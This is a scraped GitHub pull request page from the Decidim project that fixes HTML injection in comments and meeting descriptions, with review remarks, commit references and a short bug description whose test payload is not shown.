Fix HTML injection in comments and meeting's description#8511
Merged
andreslucena merged 4 commits intodecidim:developfrom Dec 10, 2021
Merged
Fix HTML injection in comments and meeting's description#8511andreslucena merged 4 commits intodecidim:developfrom
andreslucena merged 4 commits intodecidim:developfrom
Conversation
94c9206 to
d7b2685
Compare
Member
|
Good job @roxanaopr!! I tried it locally and it works as expected. Related to this PR, as we've talked last week, I also added the explanation and screenshots on how the comments feature works. |
355c40a to
fe820f1
Compare
fe820f1 to
5656cde
Compare
andreslucena
requested changes
Nov 29, 2021
Member
andreslucena
left a comment
There was a problem hiding this comment.
Great job on moving the proposal sanitization logic and reusing that for meetings! 👏🏽
I have a few suggestions, could you please check them?
Also, there are some merge conflicts to solve.
Thanks for this PR!!
decidim-meetings/spec/presenters/decidim/meetings/meeting_presenter_spec.rb
Outdated
Show resolved
Hide resolved
2fd235c to
b4fc267
Compare
8163a35 to
8835683
Compare
andreslucena
approved these changes
Dec 10, 2021
Member
|
Thanks for the PR @roxanaopr |
entantoencuanto
added a commit
to PopulateTools/decidim
that referenced
this pull request
Dec 10, 2021
* fix/meetings_form_embed_type_visibility: Fix tests by adding missing doubled attributes Include value in validation conditional Allow participants to set iframe access level of meetings Fix embed type visibility in participants form Remove blank option in meetings embed type select Fix avatar thumbnail in participants' profile (decidim#8577) Fix HTML injection in comments and meeting's description (decidim#8511) Add search, filters and sorting to admin panel budget projects (decidim#8592) Add cache key separator to cache_hash (decidim#8559) Move social login buttons to the top of the login modal (decidim#8574) Fix the meeting copy functionality (decidim#8430) Temporarily ignore CSS validation issue in CI (decidim#8597) Fix security instructions (decidim#8587)
alecslupu
pushed a commit
to i-need-another-coffee/decidim
that referenced
this pull request
Dec 14, 2021
12 tasks
alecslupu
pushed a commit
to i-need-another-coffee/decidim
that referenced
this pull request
Dec 23, 2021
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
3 participants
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
🎩 What? Why?
Comment's body and meeting's description are not escaping the html structure.
Trying to submit a comment on a proposal/meeting that contains HTML code will result in that code being treated as part of the page. This was observed as well on the description field from meetings.
📌 Related Issues
Testing
Add the following comment on a comment or meeting
The html structure will be render in the page
📋 Checklist
🚨 Please review the guidelines for contributing to this repository.
docs/.📷 Screenshots